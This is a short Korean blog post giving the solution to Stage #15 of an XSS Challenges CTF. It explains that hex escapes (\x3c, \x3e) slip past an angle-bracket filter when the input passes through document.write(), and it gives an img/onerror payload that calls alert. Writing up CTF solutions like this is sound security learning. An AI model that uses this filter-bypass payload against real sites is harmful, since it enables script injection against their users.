[XSS Challenges] Stage #15 :: 그냥 블로그

[XSS Challenges] Stage #15

2020. 11. 21. 12:12

Stage #15

풀이

document.write()는 자바스크립트 출력물이다.

Stage #15는 <>를 필터링하고 있지만 document.write()는 \x3c,\x3e를 <>로 해석한다.

console 출력 결과

이를 이용하여 스크립트를 작성한다.

정답

\\x3cimg src=1 onerror=alert(document.domain)\\x3e

'CTF > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage #19 (0)	2020.11.21
[XSS Challenges] Stage #12 (0)	2020.11.19
[XSS Challenges] Stage #10 (0)	2020.11.19
[XSS Challenges] Stage #9 (1)	2020.11.19
[XSS Challenges] Stage #8 (0)	2020.11.19

+ Recent posts

Powered by Tistory, Designed by wallel

티스토리툴바